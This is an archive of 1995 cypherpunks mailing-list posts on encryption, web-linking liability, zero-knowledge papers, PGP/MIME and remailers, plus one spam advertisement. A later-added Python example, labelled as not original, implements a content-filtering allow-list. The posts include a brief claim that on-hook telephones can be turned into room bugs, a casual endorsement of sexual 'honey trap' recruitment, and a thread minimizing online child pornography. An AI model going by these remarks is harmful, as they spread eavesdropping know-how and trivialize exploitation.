|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 14 Sep 95 12:24:35 PDT
To: cypherpunks@toad.com
Subject: Things the LEAs don't want to admit.
Message-ID: <199509141920.PAA55734@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Andrew Loewenstern writes:

<snip>

>Encryption prevents 'fishing expeditions' and  
>unauthorized monitoring;  this is what the LEAs don't want to admit.

AMEN, Andrew.

Another thing the LEAs don't want to admit is the incredible (cost
and otherwise) effectiveness of the "Honey Trap" (SEX!) when used
by (or against) them. Cash isn't the only way to recruit another
Aldrich Ames(sp?), and sex is a lot easier to launder. <g>
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
Regards, Jim Ray

"When making public-policy decisions for the government, I think one
should ask oneself which technologies would best strengthen the hand
of a police state. Then, do not allow the government to deploy those
technologies."  -- Phillip Zimmermann, talking to himself. (Congress
sure-as-hell wasn't paying attention!)
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 14 Sep 95 07:51:56 PDT
To: Frank Stuart <fstuart@vetmed.auburn.edu>
Subject: Re: An opportunity not to be missed
Message-ID: <Pine.3.89.9509141521.A20169-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Sep 1995, Frank Stuart wrote:

> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
> use through the remailers)?  You could set up a web-page with instructions
> and a list of crimes for which there are rewards.

Someone already tried that. The cops got a copy of the WWW logs and 
started investigating everyone who'd looked at the WWW page... So at the 
least you'd need a bunch of anonymous WWW proxies as well.

There's also the problem that the current ecash systems do not provide 
payee anonymity, so if you pay informers with ecash they can be traced if 
the bank and payer collude.

		Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 14 Sep 95 13:58:33 PDT
To: Dar Scott <dsc@swcp.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <v01510107ac7db81f6880@[198.59.115.127]>
Message-ID: <Pine.SUN.3.91.950914165321.24774A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 14 Sep 1995, Dar Scott wrote:

> Black Unicorn wrote,

[...]

> >> Perhaps, I could have used the phrases "non-coercion-based" licensing and
> >> "coercion-based" licensing, but I am not comfortable with these--trade
> >> licensing invokes too violent of an image.
> >
> >I think this construction is still flawed.  I will remain by my position
> >that licensing is useful when not used to collect taxes or
> >otherwise overregulate.  I also hold that the distinctions you make
> >between licensing and certification are without functional difference in
> >effect and are deceptive in that they suggest a significant difference in
> >effect or purpose where there is none.
> >
> The difference in effect is in emergent market optimization.  The
> difference in purpose is ethical.
> 
> I have learned that you--and perhaps others--do not see an important
> difference in these two styles of influencing behavior.  I see a major
> difference and in thinking the difference was obvious was slow in
> understanding your position.

I think I understand your position now.

To me there is little difference in how one is persuaded against one's 
will.  Certainly I dislike violence, but some of the "persuasive" methods 
in a market economy sicken me just as much as force might.

In any event, your construction makes sense to me, even if I do not find 
it useful myself.

> Great.  You're already enjoying breakfast and I still have to go to bed.

I hate time zones.

> Dar
> 
> ===========================================================
> Dar Scott               Home phone: +1 505 299 9497
> 
> Dar Scott Consulting         Voice: +1 505 299 5790
> 8637 Horacio Place NE        Email: darscott@aol.com
> Albuquerque, NM  87111              dsc@swcp.com
>                                Fax: +1 505 898 6525
> http://www.swcp.com/~correspo/DSC/DarScott.html
> ===========================================================
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 14 Sep 95 14:01:27 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Crimestoppers anon tip mailbox
In-Reply-To: <199509141913.MAA08819@infinity.c2.org>
Message-ID: <199509142101.RAA23535@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mark writes:
# Someone already tried that. The cops got a copy of the WWW logs and
# started investigating everyone who'd looked at the WWW page...

sameer writes:
[re: the kidnapped-child info Web page]
> 	How did they get the logs? Did they have a court order?

No. The owner of the Web page voluntarily offered the logs when asked by the
local police.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janet.dove@ledip.py (Janet Dove)
Date: Fri, 15 Sep 95 13:00:37 PDT
Subject: ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Titles
Message-ID: <janet.dove-1409951749170001@pm1-64.ixc.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi fellow 'netters,

My name is Janet Dove and I recently started using a magazine subscription
club in the USA that has a FREE 1 yr. magazine subscription deal with your
first paid order- and I have been very pleased with them.    They have
over 1,500 different USA titles that they can ship to any country on a
subscription basis.   As for computer magazines from the USA, they have more of
a selection than I ever knew even existed.  They have magazines for most
every area of interest in their list of 1,500 titles.

Within the USA, for their USA members, they are cheaper than all their
competitors and even the publishers themselves.  This is their price
guarantee.

Overseas, on the average, they are generally around one-fourth to one-half
of what the newsstands overseas charge locally for USA magazines.  On some
titles they are as little as one-tenth of what the newsstands charge.  They
feel that magazines should not be a luxury overseas.   In the USA, people
buy magazines and then toss them after reading them for just a few minutes
or hours.  They are so cheap in the USA!   Well, this company would like
to make it the same way for their overseas members.  They are also cheaper
than all their competitors in the USA and overseas, including the
publishers themselves!   This is their price guarantee.  Around one-half
their business comes from overseas, so they are very patient with new
members who only speak limited English as a 2nd language.

Their prices are so cheap because they deal direct with each publisher and
cut-out all the middlemen.


They will send you their DELUXE EMAIL CATALOGUE (around 400K-big and
juicy) !)...if you completely fill out the form below.  It has lists of
all the freebies, lists of all the titles they sell, titles broken down by
categories and detailed descriptions on nearly 1000 of the titles that
they sell.

Please do not email me as I am just a happy customer and a *busy*
student.  I don't have time to even complete my thesis in time, let alone
run my part-time software business!  Email them directly at:      
suzanne@grfn.org



*------------cut here-----------------------------------------------*
REQUEST FOR MORE INFO:  please copy this section only and email to:
                                        suzanne@grfn.org

            (sorry, but incomplete forms *cannot* be acknowledged)

Name:
Internet email address:
Smail home address:
City-State-Zip:
Country:
Work Tel. #:
Work Fax #:
Home Tel. #:
Home Fax #:
Name of USA mags you currently get on the newsstand or in the store:
Name of USA mags you currently get on a subscription basis, through the mail:
Name of USA mags you would like price quotes on when we call you:
Catalogue format desired from below 2 choices (list "1" or "2"):
(1. 22-part email message;    2.  attached file by email)

{{{Note-  22-part email can be received by anyone with any computer.
Attached file format may not be for you:  it is sent as an uncompressed
400K file formatted in Microsoft Word text only format, on a Mac;  if you
don't use Microsoft Word on a Mac - you will have to know how to convert
into a usable text format.  We cannot help you with this.   If in doubt,
we suggest you go with the universally acceptable 22-part email message. 
You can always manually spend a few minutes pasting the parts into one
whole.}}}

If you saw this on a newsgroup, which newsgroup did you see it on?:

How did you hear about us (name of person who referred you or the area of
the internet that you saw us mentioned in):   Janet Dove 
091495
*------------cut here-----------------------------------------------*



They guarantee to beat all their competitors' prices. Sometimes they are
less than half of the next best deal I have been able to find and other
times, just a little cheaper - but I have never found a lower rate yet. 
They assured me that if I ever do, they will beat it.  

They have been very helpful and helped me change my address from the USA
to Finland and then back again when I moved last month.  They are very
knowledgeable about addressing mags worldwide.

They have a deal where you can get a free 1 yr. sub to a new magazine from
a special list of over 300 popular titles published in the USA.   They
will give you this free 1 yr. sub when you place your first paid order
with them to a renewal or new subscription to any of the over 1,500
different popular USA titles they sell.  

They can arrange delivery to virtually any country and I think they have
clients in around 35 or 36 countries now.  Outside the USA there is a
charge for foreign postage and handling (on both paid and freebie subs)
that varies from magazine to magazine.  I have found their staff to be
very friendly and courteous.  They even helped me with an address change
when I moved from one country to another.
 
The owner thinks of his service as a "club" and his clients as "members"
(even though there is no extra fee to become a member - your first
purchase automatically makes you a member) and he is real picky about who
he accepts as a new member.   When he sets you up as a new member, he
himself calls you personally on the phone to explain how he works his
deal, or sometimes he has one of his assistants call.  He is kind of
quirky sometimes - he insists on setting up new members by phone so he can
say hi to everyone (I sure wouldn't want to have his phone bills!),  but
you can place future orders (after your first order) via E-mail.   

He has some really friendly young ladies working for him, who seem to know
just as much as he does about this magazine stuff.  If you live overseas,
he will even call you there, as long as you are interested, but I think he
still makes all his overseas calls on the weekends, I guess cause the long
distance rates are cheaper then.  

He only likes to take new members from referrals from satisfied existing
members and he does virtually no advertising.  When I got set-up, they had
a 2-3 week waiting list for new members to be called back so that they
could join up. (Once you are an existing member, they help you immediately
when you call. )  I think they are able to get back to prospective new
members  the same day or within a few days now, as they have increased
their staff.  I am not sure about this.........but if you email the above
form to them, that is the way to get started!

They will send you some FREE info. via E-mail (the short version (around
40K) of their catalogue, or if you request it the DELUXE LONG VERSION
(around 400K-big and juicy) !)...if you fill out the form near the top of
this message.

They then send you email  that outlines how his club works and the list of
free choices that you can choose from, as well as the entire list of what
he sells;  and then they will give you a quick (3-5 minute) friendly,
no-pressure no-obligation call to explain everything to you personally and
answer all your questions.

Once you get in, you'll love them. I do.  For more info,  just fill out
the form near the top of this message and email it to:      
suzanne@grfn.org


Sincerely,

Janet Dove




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joseph@genome.wi.mit.edu (Joseph Sokol-Margolis)
Date: Thu, 14 Sep 95 14:55:32 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <v02130501ac7e53505548@[18.157.1.107]>
MIME-Version: 1.0
Content-Type: text/plain


>>And Duncan's specific point remains:
>>
>>-- is it a violation of pornography laws (perhaps campus rules) to have a
>>home page with links to URLs containing pornographic images?
>>
>>-- is it a violation of _child pornography_ laws to have a home page with
>>links to URLs containing child pornography images? (The URLs could be
>>offshore, perhaps in jurisdictions where the age of consent is much
>>different than in the U.S., e.g., Denmark or Thailand.)
>>
>>-- is it a violation of national security laws to have a home page with
>>links to URLs containing national defense secrets? (The URLs could be
>>offshore.)
>>
>>-- is it a violation of copyright/patent laws to have home pages with
>>pointers to protected material? (Songs, written works, images, inventions,
>>etc.)
>>
>>And so on....

Here's my question, and a thought to ponder: If it is/becomes illegal to
have links on a homepage to pornography because it is ruled as the same as
having the pornography there; then can you have links to pages with links
(the same as having it) to pornography? This repeats, so would it be legal
to have links at all?

--------------------------------------------------------------------------------
Joseph Sokol-Margolis                                   joseph@genome.wi.mit.edu
Assistant Systems Administrator                                     seph@mit.edu
Whitehead Institute/MIT
Center for Genome Research                                 phone: (617) 252-1922
One Kendall Sq. Bldg. 300                                    fax: (617) 252-1902
Cambridge, MA 02139-1561
----------------------http://www-genome.wi.mit.edu/~joseph/---------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Thu, 14 Sep 95 17:09:33 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <v01510101ac7e7081b71f@[198.59.115.134]>
MIME-Version: 1.0
Content-Type: text/plain


Suppose we interpret Linking = Showing as

For all web pages x and y,
Showing(x) and  Linkto(x,y) --> Showing(y)

Meaning:  In all cases, if a page is being shown and it links to another
page, then the other page is being shown.

With this kind of transitivity I would not be surprised if a third of the
web sites are showing pornography.

For example (made up titles!), Transistors --> Electronics Distributors -->
Ray's TV --> Springfield Businesses --> Bob's Photography --> Plenty
Pictures --> Photography Resources --> Asian, Female --> World Nudity -->
John's Porno Shop.  The poor guy trying to be helpful to those learning
electronics now has a pornopage.

Perhaps some kind of fuzzy logic could apply.  If one believes in such a
thing.

I wonder if I have a pornopage.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Thu, 14 Sep 95 16:39:21 PDT
To: joseph@genome.wi.mit.edu
Subject: Re: Linking = Showing = Transferring?
Message-ID: <199509142338.SAA10960@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


[...]
>Here's my question, and a thought to ponder: If it is/becomes illegal to
>have links on a homepage to pornography because it is ruled as the same as
>having the pornography there; then can you have links to pages with links
>(the same as having it) to pornography? This repeats, so would it be legal
>to have links at all?
[...]

And then there's the problem of URLs not being static.  What may be a perfectly
innocuous link one day may turn into something not perceived as harmless the
next.  I seem to recall reading about a French site (Femmes Femmes Femmes)
that offered pictures of nude females.  When the traffic got too much for
them, they jokingly changed the links to point to pictures at the Louvre.
However, it could just as easily happen the other way.

I also heard something about the ACM taking the position that a URL was not
equivalent to the work itself, but I don't have a reference.


Frank Stuart              | (Admiral Grace) Hopper's Law:
fstuart@vetmed.auburn.edu | It's easier to get forgiveness than permission. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 14 Sep 95 15:57:37 PDT
To: cypherpunks@toad.com
Subject: Re: cryptography eliminates lawyers?
Message-ID: <199509142253.SAA63671@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Brian Davis wrote:

<snip>

>Just wondering about liability issues after state accrediting is dead.

<snip>

<I can resist jumping in no longer...>

Despite loud squawking, "chaos" will not ensue. Instead, the private
sector will take over assessing risk, which it has always done better.

An example: I'd rather jump into a full bathtub with a plugged-in,
UL [Underwriter's Laboratories] certified TV set than take the FDA
approved (but very dangerous, IMO) prostate drug called "Proscar."
While there is only one UL (by choice, not force) and only one FDA
(by force, not choice) I can easily imagine lawyer-certifying
companies like UL for appliances, probably tied [like UL] to the
insurance industry. [I am not a lawyer, or a doctor either.]
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
Regards, Jim Ray

"When making public-policy decisions for the government, I think one
should ask oneself which technologies would best strengthen the hand
of a police state. Then, do not allow the government to deploy those
technologies."  -- Phillip Zimmermann, talking to himself. (Congress
sure-as-hell wasn't paying attention!)
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Thu, 14 Sep 95 17:00:16 PDT
To: "cypherpunks@toad.com>
Subject: Re: <SAFER SK-xx>
Message-ID: <199509150009.TAA09893@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: David E. Smith * EMC.Ver #2.5.02 ] --

> /* SAFER SK-128 designed by James L. Massey who did not do this
>    conversion and is not responsible for any bugs in it.
> 
>    This a 'C' conversion of the reference Turbo Pascal implementation

Does anyone out there have a pointer to the "Turbo Pascal implementation?"

(Or the code itself?)

Reply to me, not the list; there's quite enough spam as it is.


--
David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO 63701-4745
(314)339-3814, dsmith@midwest.net, PGP ID 0x92732139
Opinions are mine (though I often claim demonic possession)
http://www.midwest.net/scribers/dsmith/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Thu, 14 Sep 95 17:58:50 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <v01510102ac7e786c9378@[198.59.115.134]>
MIME-Version: 1.0
Content-Type: text/plain


Whoops!  I mentioned the "linking to a page that links to a page..."
problem without noticing that Joseph Sokol-Margolis had already brought it
up.

Maybe pornography is not in the page (or resource) but in the browser.  For
example, I have a "pornography enabled" browser, because I can use it to
access pornopages.  What if I set up a browser for my child that saw a
smaller view of the net that did not include pornopages.  That browser
would not be "pornography enabled".  The limited view could be created from
some combination of lists of OK sites & pages, lists of off-limits sites &
pages, and certification requirements for those in between (virtual OK
lists).  I have seen the off-limits lists in association with some blocking
products.

Frank Stuart wrote,
>And then there's the problem of URLs not being static.  What may be a perfectly
>innocuous link one day may turn into something not perceived as harmless the
>next.

The blocking (off-limits) lists are then always behind and flawed.  Better
OK lists might be created by the list publisher having contractual
commitments from the site owner.  A virtual OK list publisher would publish
the key for verifying approved pages that have built-in certs.  This would
provide the better probability that the browser was not pornography
enabled.  A page would not show if it had been changed.  A problem to be
solved would be doing this with minimal psychological time costs to the
user.  Another is making sure that getting certs would not be such a pain
that only a few sites would be on the virtual OK list.

Of course, I would not want my kids under 10 to see certain ideological
pages and there might not be a market to justify certs.  I would have to
make my own list or get a cheap blocking list or something from the
major-group-with-same-ideological-bent-as-dar ftp site.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================
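
The "virtual OK list" from the message above, as an added Python example that is not part of the original post. It assumes a hash-only stand-in for the public-key signature the post implies: the publisher's published verification value is a Merkle root over the approved (URL, content) pairs, and each page's built-in cert is its inclusion proof. The class, function names and sample pages are hypothetical and constructed for illustration.

```python
import hashlib
from typing import Dict, List, Tuple

# A cert is a Merkle inclusion proof: (sibling hash, sibling_is_on_the_right) pairs.
Cert = List[Tuple[bytes, bool]]


def _sha256(*parts: bytes) -> bytes:
    return hashlib.sha256(b"".join(parts)).digest()


def leaf_hash(url: str, body: bytes) -> bytes:
    """Bind a URL to the exact bytes that were approved for it."""
    u = url.encode("utf-8")
    # 0x00 marks a leaf; the length prefix keeps (url, body) unambiguous.
    return _sha256(b"\x00", len(u).to_bytes(4, "big"), u, _sha256(body))


def _node(left: bytes, right: bytes) -> bytes:
    # 0x01 marks an inner node, so a leaf can never be passed off as a node.
    return _sha256(b"\x01", left, right)


class OkListPublisher:
    """Hypothetical list publisher: approves pages, publishes one root value."""

    def __init__(self, approved: Dict[str, bytes]):
        if not approved:
            raise ValueError("an OK list needs at least one page")
        self.urls = sorted(approved)
        level = [leaf_hash(u, approved[u]) for u in self.urls]
        self.levels = [level]
        while len(level) > 1:
            nxt = []
            for i in range(0, len(level), 2):
                if i + 1 < len(level):
                    nxt.append(_node(level[i], level[i + 1]))
                else:
                    nxt.append(level[i])  # odd node is promoted, not duplicated
            level = nxt
            self.levels.append(level)
        self.root = level[0]  # the value the publisher distributes to browsers

    def cert_for(self, url: str) -> Cert:
        """The built-in cert the site owner embeds in the approved page."""
        index = self.urls.index(url)  # raises ValueError for unapproved URLs
        cert: Cert = []
        for level in self.levels[:-1]:
            sibling = index ^ 1
            if sibling < len(level):
                cert.append((level[sibling], sibling > index))
            index //= 2
        return cert


def browser_should_show(url: str, body: bytes, cert: Cert, root: bytes) -> bool:
    """Restricted browser: render only if (url, body, cert) hashes up to root."""
    h = leaf_hash(url, body)
    for sibling, on_right in cert:
        if len(sibling) != 32:
            return False  # malformed cert
        h = _node(h, sibling) if on_right else _node(sibling, h)
    return h == root


def demo() -> Dict[str, bool]:
    # Constructed sample pages; hosts use the reserved .example domain.
    approved = {
        "http://kids.example/louvre.html": b"<h1>Paintings at the Louvre</h1>",
        "http://kids.example/transistors.html": b"<h1>How transistors work</h1>",
        "http://school.example/index.html": b"<h1>Springfield School</h1>",
        "http://museum.example/dinosaurs.html": b"<h1>Dinosaurs</h1>",
        "http://library.example/books.html": b"<h1>Reading list</h1>",
    }
    pub = OkListPublisher(approved)
    url = "http://kids.example/louvre.html"
    cert = pub.cert_for(url)
    return {
        # Unchanged approved page: shown.
        "approved_page": browser_should_show(url, approved[url], cert, pub.root),
        # Same URL, content swapped after approval (the non-static URL problem).
        "edited_after_approval": browser_should_show(
            url, b"<h1>Something else entirely</h1>", cert, pub.root),
        # A valid cert copied onto a page at a different URL.
        "cert_moved_to_other_url": browser_should_show(
            "http://other.example/louvre.html", approved[url], cert, pub.root),
        # A page that was never approved and carries no cert.
        "unlisted_page_no_cert": browser_should_show(
            "http://other.example/", b"<h1>hi</h1>", [], pub.root),
        # Every listed page verifies, including the promoted odd leaf.
        "every_listed_page_verifies": all(
            browser_should_show(u, approved[u], pub.cert_for(u), pub.root)
            for u in approved),
    }
```

Approving one more page changes the root, so every browser needs the new root and every listed page a fresh cert, which is the cert-issuing cost the post worries about. The root itself still has to reach the browser over a channel the parent trusts.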






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 14 Sep 95 16:26:27 PDT
To: owner-cypherpunks@toad.com
Subject: Re: NSA on GAK
Message-ID: <9509142325.AA06863@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>> Internet runs on software distributed over the Internet.

This is more like an aphorism than a true statement.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 14 Sep 95 19:28:55 PDT
To: cypherpunks@toad.com
Subject: Re: Explaining Zero Knowledge to your children
Message-ID: <ac7de719050210049b11@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:18 PM 9/14/95, Hadmut Danisch wrote:
>There is a paper about explaining Zero Knowledge methods in simple
>words. It's titled "Explaining Zero Knowledge Authentication to your
>children" or something similar. It's said to be in the proceedings of
>any conference. Does anybody know where to find it?

Schneier describes the "cave" analogy in his book, on p. 85, and gives a
reference:

Quisquater, Guillou, Berson, "How to Explain Zero-Knowledge Protocols to
your Children," Advances in Cryptology--CRYPTO '89 Proceedings.

The paper is only a couple of pages long and would make a nice scan project
for someone, as it has no equations.

But Schneier is the easiest way to read up on it.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 14 Sep 95 18:05:25 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: GAK
In-Reply-To: <199509150055.UAA18048@book.hks.net>
Message-ID: <9509150104.AA03601@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
 > Most telephones can be used to monitor conversations in the room they are
 > installed in even while on-hook. No need to ever enter the premises. Just
 > drive it with AC.  Look at your basic telephone diagram and remember
 > Xc=1/(omega*C) from your AC circuits class.

The phrase "most telephones" may have been accurate when it meant "500
sets", but now that people generally own electronic phones I wonder
whether the lucky one's statement remains true.  (It might; I'm an
electronics ignoramus.)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 17:09:16 PDT
To: cypherpunks@toad.com
Subject: Re: DD, pedaphiles, and Terrorists, oh my
Message-ID: <199509150006.UAA17827@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9509141640.AA30602@zorch.w3.org>, hallam@w3.org wrote:


>We never used to see kiddie porn on the internet. The net would go ballistic
>if a picture of a teen age nude was posted. Recently there has been a flood
>of hard core paedophile material.

There have always been nude teens on the net. The kind of pictures the most
casual observer can take at any Mediterranean beach at any given day in the
Summer. There is no real kiddy porn readily available on the net.  I
looked long and hard. It's a red herring.

ANYBODY on this list seen some real kiddy porn on the net? I am talking
intercourse, etc., not scans of six year olds from the Sears catalog, or
naked boys building sandcastles on the beach.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFjDkioZzwIn1bdtAQEB0gF+M67Ih6WLAl8J9bxPZOBmyjxKsxUczpqv
th5x7ZuILyuf/+bFTtcLKwbOnzZkIfpJ
=pjLL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 17:13:32 PDT
To: cypherpunks@toad.com
Subject: Re: Child Porn, Morphing, and Pointers
Message-ID: <199509150010.UAA17856@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac7db05202021004bc61@[205.199.118.202]>, tcmay@got.net
(Timothy C. May) wrote:

>>If I'm reading this correctly, if I Photoshop a kids face onto the body
>>of the latest Playboy centerfold, I'm in violation of this proposed law?
>
>I believe there have already been prosecutions along these lines. For
>example, do you think a _comic book_ with child porn themes ("explicit"
>art, situations) would not be prosecuted as child porn?
>
>I strongly suspect that a _painting_ of a 7-year-old girl engaged in a sex
>act would result in a prosecution.

Any cites?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFjEkSoZzwIn1bdtAQFO5gGAvKEwd8DuWbNAzMtkqQ4BCPrp5YAOWrcu
eSooY922jvZlXV+PYFcamevbR3mZ4bYj
=Jxeu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 14 Sep 95 11:19:32 PDT
To: cypherpunks@toad.com
Subject: Explaining Zero Knowledge to your children
Message-ID: <9509141818.AA05757@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



There is a paper about explaining Zero Knowledge methods in simple
words. It's titled "Explaining Zero Knowledge Authentication to your
children" or something similar. It's said to be in the proceedings of
any conference. Does anybody know where to find it?

Thanks
Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Hamilton <martin@mrrl.lut.ac.uk>
Date: Thu, 14 Sep 95 12:44:21 PDT
To: cypherpunks@toad.com
Subject: Re: MOSS [IETF privacy-enhanced mail, modified for MIME] now available
In-Reply-To: <9509132335.AA05053@sulphur.osf.org>
Message-ID: <199509141944.UAA22502@gizmo.lut.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:

| >From pem-dev-request@neptune.tis.com Wed Sep 13 19:27:35 1995
| Message-Id: <9509132011.AA19261@tis.com>
| Reply-To: James M Galvin <tismoss-support@TIS.COM>
| To: "MOSS.Announce.List":;, tis.com@TIS.COM
| Subject: ANNOUNCE: TIS/MOSS Version 7.1

[...]

| 3
| Q: How does MOSS compare to PGP and PEM?
| 
| PGP can provide the same services but since it is not integrated with
| MIME the interpretation of the protected content is necessarily user
| controlled.  Note, however, that MIME can carry a PGP object.

Just wondering - is anyone working on a profile for PGP under MOSS
and/or the multipart/signed and multipart/encrypted body parts ?

Whether or not they are, it would be useful to have a de-facto
standard for the use of PGP with current MIME implementations.  I
recall there was a draft RFC by Nathaniel Borenstein which dealt
with this, but it was withdrawn to leave the way clear for MOSS ?

Why bother ?  Well, there are lots of mailers out there with "some"
MIME support - enough for launching a helper application to read
and perhaps compose (say) application/pgp, but not nearly enough to
handle MOSS.  I'm thinking about commercial offerings for the likes
of MacOS, DOS, and Windows in particular.  It seems like a really 
neat hack to use the MIME support to bring PGP in by stealth, but
perhaps most of the implementations Out There are too crippled ?

Over to you... :-)

Martin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ROBO Mixmaster Remailer <robo@c2.org>
Date: Thu, 14 Sep 95 20:57:55 PDT
To: mix-l@jpunix.com.cypherpunks@toad.com
Subject: RE: Mixmaster status
Message-ID: <199509150345.UAA16323@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Flame Remailer <remailer@flame.alias.net> wrote:

> Subject: Mixmaster status
>
>   There has been an offer to purchase and commercially develop Mixmaster.
>   This will hasten the development of Mixmaster for other platforms (e.g.
>   Dos, Windows  Macintosh), and bring significant improvements to the
>   interface, but I will not compromise on the level of security provided by
>   Mixmaster. Free client software will continue to be available.
>
>   This could be the big breakthrough for remailers, finally thrusting them
>   out of the hobbyist's closet into the corporate world.
>
